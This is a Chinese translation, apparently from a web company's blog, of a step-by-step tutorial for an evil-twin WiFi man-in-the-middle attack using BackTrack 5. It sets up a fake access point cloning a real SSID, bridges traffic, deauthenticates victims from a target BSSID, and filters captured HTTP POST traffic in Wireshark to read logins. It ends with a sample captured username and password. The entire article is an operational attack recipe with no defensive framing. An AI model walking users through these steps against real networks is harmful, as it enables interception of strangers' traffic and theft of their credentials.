新聞中心
前言:先說(shuō)明一下,這個(gè)文章不是我寫(xiě)的,是一個(gè)老外(Deepanshu Kapoor)安全專(zhuān)家寫(xiě)的,我一開(kāi)始就是看著玩,但整個(gè)看完被老外那個(gè)細(xì)心和耐心給打動(dòng)了,整個(gè)過(guò)程其實(shí)很簡(jiǎn)單,但是老外分了好多步驟來(lái)講解,每個(gè)步驟都有配圖和說(shuō)明,甚至命令的參數(shù)都要解釋一下。不得不佩服老外分享和奉獻(xiàn)的精神,所以我也學(xué)著奉獻(xiàn)一下,把它翻譯成中文給大家看看吧,我盡量保持原汁原味,有不恰當(dāng)?shù)牡胤揭徫遥吘刮也皇菍?zhuān)業(yè)翻譯。

BT5 + wireshark玩wifi數(shù)據(jù)包捕獲和session注入(中間人攻擊)
介紹:
主要思路是通過(guò)偽造相同名稱(chēng)的wifi接入點(diǎn),配合發(fā)送ARP數(shù)據(jù)包,攻擊連入偽造wifi的用戶(hù)。一個(gè)與原有wifi相同名稱(chēng)的偽造接入點(diǎn)一旦建立,會(huì)導(dǎo)致用戶(hù)從原有鏈接中斷開(kāi),并連入你所建立的偽造接入點(diǎn)中,因此所有的通信通道都會(huì)流經(jīng)我的系統(tǒng),屆時(shí)我們通常會(huì)用session注入的方式拿到用戶(hù)所有的細(xì)節(jié)/授信狀態(tài)/信息等。
必備神器:
1,BT5(Backtrack操作系統(tǒng))
2,虛擬機(jī)(帶USB設(shè)備)
3,可聯(lián)網(wǎng)的主機(jī)
第一步:
開(kāi)BT5的terminal終端,然后輸入”iwconfig” 檢查無(wú)線(xiàn)網(wǎng)卡。
說(shuō)明:iwconfig類(lèi)似于ifconfig,但是是用于無(wú)線(xiàn)網(wǎng)絡(luò)的。它經(jīng)常被用來(lái)設(shè)置無(wú)線(xiàn)網(wǎng)卡的參數(shù)。
第二步:
輸入“airmon-ng start wlan0”開(kāi)啟無(wú)線(xiàn)網(wǎng)卡。
說(shuō)明:這個(gè)命令可以被用來(lái)讓無(wú)線(xiàn)網(wǎng)卡處于監(jiān)聽(tīng)狀態(tài)。也可以被用來(lái)從監(jiān)聽(tīng)模式中恢復(fù)成管理模式。輸入 “airmon-ng”不帶參數(shù),可以顯示網(wǎng)卡狀態(tài)。
wlan0 是指wifi網(wǎng)卡。
wlan 是無(wú)線(xiàn)局域網(wǎng), 0 是你的網(wǎng)卡編號(hào)。
第三步:
在網(wǎng)卡已經(jīng)啟動(dòng)了監(jiān)聽(tīng)模式后,輸入“airodump-ng mon0”就可以開(kāi)始抓包了。
說(shuō)明:airodump-ng 可以用來(lái)抓802.11的原始幀數(shù)據(jù)包,特別適合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能夠用來(lái)記錄找到的接入點(diǎn)的坐標(biāo)。
mon0在監(jiān)聽(tīng)模式下和wlan0的意思是一樣的。
一旦你把wlan0設(shè)置為監(jiān)聽(tīng)模式,wlan0就要改為mon0。
第四步:
設(shè)置在airodump-ng中顯示的頻道ID,命令如下:
“iwconfig mon0 channel 5” “iwconfig wlan0 channel 5”
或者
“iwconfig wlan0 channel 5” “iwconfig mon0 channel 5”
說(shuō)明:參數(shù)“channel”用來(lái)選定一個(gè)單獨(dú)的特殊頻道。
第五步:
現(xiàn)在開(kāi)始建立你的偽造路由器,命令如下:
“airbase-ng - e “belkin.3448” mon0”
說(shuō)明:airbase-ng是個(gè)多用途的工具,可針對(duì)AP(接入點(diǎn))自身的客戶(hù)端進(jìn)行攻擊,主要的思路是驅(qū)使客戶(hù)端去連接偽造的AP,不是阻止客戶(hù)端去連接真實(shí)AP。
“-e + SSID”指定偽造AP的SSID名稱(chēng)。
第六步:
現(xiàn)在是時(shí)候去“橋接”所有的網(wǎng)絡(luò)了,命令如下:
“brctl addbr mitm”
“brctl addif mitm eth0”
“brctl addif mitm at0”
中間人就是 。(這句話(huà)看原文直接翻譯有些難以理解,實(shí)際上作者就是想說(shuō)at0這個(gè)網(wǎng)卡架起來(lái)的網(wǎng)橋就是個(gè)中間人,攻擊就是在這里完成的。—–譯者注)
說(shuō)明:
Brctl 用來(lái)在兩個(gè)網(wǎng)卡之間建立橋接網(wǎng)絡(luò)。
Addbr 用來(lái)添加網(wǎng)橋的對(duì)象,用來(lái)指定網(wǎng)橋的名稱(chēng)。
Addif 給已經(jīng)使用addbr創(chuàng)建的網(wǎng)橋中添加一個(gè)網(wǎng)卡,后邊的參數(shù)使用你要添加的網(wǎng)卡名稱(chēng)即可。
第七步:
現(xiàn)在創(chuàng)建一個(gè)新的網(wǎng)卡配置,命令如下:
“ifconfig eth0 0.0.0.0 up”
“ifconfig at0 0.0.0.0 up”
說(shuō)明:ifconfig 不用多說(shuō)了,用來(lái)配置網(wǎng)卡,大家經(jīng)常用的。
第八步:
現(xiàn)在可以啟動(dòng)我們用來(lái)做中間人攻擊的網(wǎng)橋了!命令如下:
“ifconfig mitm up”
說(shuō)明:配置完成的網(wǎng)橋可以使用ifconfig來(lái)啟用。
第九步:
現(xiàn)在使用下面的命令發(fā)送認(rèn)證包到路由器上,
“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”
說(shuō)明:aireplay-ng 用來(lái)注入幀數(shù)據(jù)。
-a 指定被攻擊者的BSSID。
94:44:52:DA:B4:28這個(gè)是被攻擊者的BSSID。
第十步:
現(xiàn)在開(kāi)始給被攻擊者分配IP,命令如下:
“dhclient3 mitm&” 或者 “dhclient3 mitm &”
說(shuō)明:
使用類(lèi)似DHCP的協(xié)議方式分配IP。
第十一步:
現(xiàn)在你可以看看是不是有客戶(hù)端已經(jīng)連接上了,有的話(huà)會(huì)顯示在第五步的那個(gè)命令終端里面。
第十二步:
開(kāi)wireshark,命令:“wireshark&”
說(shuō)明:wireshark是個(gè)網(wǎng)絡(luò)協(xié)議抓包分析器。
第十三步:
選擇網(wǎng)卡,點(diǎn)開(kāi)始(start)
第十四步:
輸入 “http contains POST”過(guò)濾一下,然后你就可以看到所有抓下來(lái)的數(shù)據(jù)包了。
http://exploit.deepanshukapoor.org/admin.php
Username – john
Password – 1234
本文標(biāo)題:BT5+wireshark玩wifi捕獲和中間人攻擊
本文來(lái)源:http://fisionsoft.com.cn/article/dhegdis.html


咨詢(xún)
建站咨詢(xún)
